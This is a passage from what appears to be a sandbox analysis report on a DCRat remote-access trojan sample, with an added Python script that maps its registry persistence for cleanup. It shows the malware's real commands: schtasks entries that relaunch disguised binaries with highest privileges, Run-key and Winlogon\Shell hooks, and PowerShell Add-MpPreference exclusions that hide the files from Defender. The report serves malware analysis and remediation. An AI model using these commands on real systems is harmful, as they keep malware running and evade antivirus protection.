| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\backgroundTaskHost.exe\", \"C:\\Program Files (x86)\\Microsoft\\RuntimeBroker.exe\", \"C:\\Program Files\\Microsoft Office\\PackageManifests\\upfc.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\es-ES\\StartMenuExperienceHost.exe\", \"C:\\Recovery\\WindowsRE\\Registry.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\backgroundTaskHost.exe\", \"C:\\Program Files (x86)\\Microsoft\\RuntimeBroker.exe\", \"C:\\Program Files\\Microsoft Office\\PackageManifests\\upfc.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\es-ES\\StartMenuExperienceHost.exe\", \"C:\\Recovery\\WindowsRE\\Registry.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\services.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\backgroundTaskHost.exe\", \"C:\\Program Files (x86)\\Microsoft\\RuntimeBroker.exe\", \"C:\\Program Files\\Microsoft Office\\PackageManifests\\upfc.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\es-ES\\StartMenuExperienceHost.exe\", \"C:\\Recovery\\WindowsRE\\Registry.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\services.exe\", \"C:\\Program Files\\Windows NT\\Accessories\\wininit.exe\", \"C:\\Windows\\SchCache\\SppExtComObj.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\backgroundTaskHost.exe\", \"C:\\Program Files (x86)\\Microsoft\\RuntimeBroker.exe\", \"C:\\Program Files\\Microsoft Office\\PackageManifests\\upfc.exe\", \"C:\\Program Files (x86)\\Internet Explorer\\es-ES\\StartMenuExperienceHost.exe\", \"C:\\Recovery\\WindowsRE\\Registry.exe\", \"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\services.exe\", \"C:\\Program Files\\Windows NT\\Accessories\\wininit.exe\", \"C:\\Windows\\SchCache\\SppExtComObj.exe\", \"C:\\Program Files\\Windows Portable Devices\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Recovery\WindowsRE\Registry.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\backgroundTaskHost = "\"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\backgroundTaskHost.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\StartMenuExperienceHost = "\"C:\\Program Files (x86)\\Internet Explorer\\es-ES\\StartMenuExperienceHost.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\StartMenuExperienceHost = "\"C:\\Program Files (x86)\\Internet Explorer\\es-ES\\StartMenuExperienceHost.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\services.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SppExtComObj = "\"C:\\Windows\\SchCache\\SppExtComObj.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Registry = "\"C:\\Recovery\\WindowsRE\\Registry.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\Program Files\\Windows NT\\Accessories\\wininit.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Program Files (x86)\\Microsoft\\RuntimeBroker.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Registry = "\"C:\\Recovery\\WindowsRE\\Registry.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SppExtComObj = "\"C:\\Windows\\SchCache\\SppExtComObj.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400 = "\"C:\\Program Files\\Windows Portable Devices\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400 = "\"C:\\Program Files\\Windows Portable Devices\\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\backgroundTaskHost = "\"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\backgroundTaskHost.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Program Files (x86)\\Microsoft\\RuntimeBroker.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\upfc = "\"C:\\Program Files\\Microsoft Office\\PackageManifests\\upfc.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\upfc = "\"C:\\Program Files\\Microsoft Office\\PackageManifests\\upfc.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\services.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wininit = "\"C:\\Program Files\\Windows NT\\Accessories\\wininit.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
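The Winlogon\Shell rows earlier in this detonation and the Run-key rows just above wire the same dropped binaries into several launch mechanisms at once: the Shell value is rewritten to `explorer.exe` followed by a growing comma-separated list of paths, and each path additionally gets both an HKLM and an HKCU Run value. The script below is an added example, not sandbox or malware code; it parses these rows into a per-binary view of the mechanisms each one is registered under. The sample strings are constructed from rows shown on the page (a subset, kept in the report's JSON-style escaping, `\\` for a backslash and `\"` for a quote), and the row layout it expects is the four-column table used on this page.

```python
r"""Parse the registry persistence rows of a sandbox report (Winlogon\Shell
and Run keys, JSON-style escaped: \\ for a backslash, \" for a quote) into a
map of persisted binary -> launch mechanisms.

Added example for this page; not sandbox or malware code.
"""
import csv
import re

# Constructed sample: one Shell value and six Run-key rows copied from the page.
SHELL_VALUE_RAW = r'''explorer.exe, \"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\backgroundTaskHost.exe\", \"C:\\Program Files (x86)\\Microsoft\\RuntimeBroker.exe\", \"C:\\Program Files\\Microsoft Office\\PackageManifests\\upfc.exe\"'''
RUN_ROWS = [
    r'''| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\backgroundTaskHost = "\"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\backgroundTaskHost.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |''',
    r'''| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\backgroundTaskHost = "\"C:\\Program Files (x86)\\Microsoft.NET\\Primary Interop Assemblies\\backgroundTaskHost.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |''',
    r'''| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Program Files (x86)\\Microsoft\\RuntimeBroker.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |''',
    r'''| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Program Files (x86)\\Microsoft\\RuntimeBroker.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |''',
    r'''| Set value (str) | \REGISTRY\USER\S-1-5-21-4124900551-4068476067-3491212533-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\upfc = "\"C:\\Program Files\\Microsoft Office\\PackageManifests\\upfc.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |''',
    r'''| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Program Files (x86)\\Windows Photo Viewer\\en-US\\services.exe\"" | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |''',
]

RUN_ROW_RE = re.compile(
    r'\\REGISTRY\\(?P<hive>MACHINE|USER\\S-[\d-]+)\\SOFTWARE\\Microsoft\\Windows'
    r'\\CurrentVersion\\Run\\(?P<name>\S+) = "(?P<value>.*)"',
    re.IGNORECASE,
)


def unescape(s):
    # Undo the report's escaping: a backslash before '\' or '"' is dropped.
    out, i = [], 0
    while i < len(s):
        if s[i] == "\\" and i + 1 < len(s) and s[i + 1] in '\\"':
            out.append(s[i + 1])
            i += 2
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


def shell_entries(raw_value):
    """Split a Winlogon Shell value into the programs started at logon (csv-style: quoted, comma separated)."""
    return [e for e in next(csv.reader([unescape(raw_value)], skipinitialspace=True)) if e]


def rogue_shell_entries(raw_value):
    # Stock Windows sets Shell to exactly "explorer.exe"; every extra entry is a persistence hook.
    return [e for e in shell_entries(raw_value) if e.strip().lower() != "explorer.exe"]


def parse_run_row(row):
    """One row of the 'Adds Run key' table -> {hive, name, target, writer}, or None."""
    cells = [c.strip() for c in row.strip().strip("|").split("|")]
    if len(cells) < 3:
        return None
    m = RUN_ROW_RE.search(cells[1])
    if not m:
        return None
    hive = "HKLM" if m["hive"].upper() == "MACHINE" else "HKCU"  # HKU\<SID> is that user's HKCU
    return {"hive": hive, "name": m["name"], "target": unescape(m["value"]).strip('"'), "writer": cells[2]}


def persistence_matrix(shell_raw, run_rows):
    """Map each persisted binary (lower-cased path) to the sorted mechanisms that launch it."""
    mechanisms = {}
    for entry in rogue_shell_entries(shell_raw):
        mechanisms.setdefault(entry.lower(), set()).add("Winlogon\\Shell")
    for row in run_rows:
        rec = parse_run_row(row)
        if rec:
            mechanisms.setdefault(rec["target"].lower(), set()).add(rec["hive"] + "\\Run")
    return {path: sorted(m) for path, m in mechanisms.items()}


if __name__ == "__main__":
    for path, hooks in persistence_matrix(SHELL_VALUE_RAW, RUN_ROWS).items():
        print(f"{path}\n    {', '.join(hooks)}")
```

The useful output is the count per binary: a file reachable through Winlogon\Shell and both Run hives survives the removal of any single one of them, so remediation has to clear all three (and the scheduled tasks from the process list) before the dropped files are deleted, or the next logon re-creates the rest. The same parser works on the behavioral1 tables, where the Shell list grows to nine entries.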
Drops file in Program Files directory
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SchCache\SppExtComObj.exe | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| File created | C:\Windows\SchCache\e1ef82546f0b02 | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| File opened for modification | C:\Windows\SchCache\RCX6BE1.tmp | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
| File opened for modification | C:\Windows\SchCache\SppExtComObj.exe | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe
"C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe"
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\backgroundTaskHost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\backgroundTaskHost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\backgroundTaskHost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Microsoft\RuntimeBroker.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Microsoft\RuntimeBroker.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 8 /tr "'C:\Program Files\Microsoft Office\PackageManifests\upfc.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "upfc" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\PackageManifests\upfc.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "upfcu" /sc MINUTE /mo 8 /tr "'C:\Program Files\Microsoft Office\PackageManifests\upfc.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Internet Explorer\es-ES\StartMenuExperienceHost.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Program Files (x86)\Internet Explorer\es-ES\StartMenuExperienceHost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Internet Explorer\es-ES\StartMenuExperienceHost.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 9 /tr "'C:\Recovery\WindowsRE\Registry.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Registry" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\Registry.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "RegistryR" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\Registry.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Windows Photo Viewer\en-US\services.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\en-US\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Photo Viewer\en-US\services.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 12 /tr "'C:\Program Files\Windows NT\Accessories\wininit.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files\Windows NT\Accessories\wininit.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows NT\Accessories\wininit.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 9 /tr "'C:\Windows\SchCache\SppExtComObj.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Windows\SchCache\SppExtComObj.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 14 /tr "'C:\Windows\SchCache\SppExtComObj.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e4002" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Portable Devices\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe'" /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe'" /rl HIGHEST /f
C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e4002" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Portable Devices\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe'" /rl HIGHEST /f
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\22cdd8b1c569a17884bd5ab6d67a77ada1309b849775b3967a91111f3ab0e400.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\backgroundTaskHost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft\RuntimeBroker.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Microsoft Office\PackageManifests\upfc.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Internet Explorer\es-ES\StartMenuExperienceHost.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\Registry.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Photo Viewer\en-US\services.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows NT\Accessories\wininit.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\SchCache\SppExtComObj.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
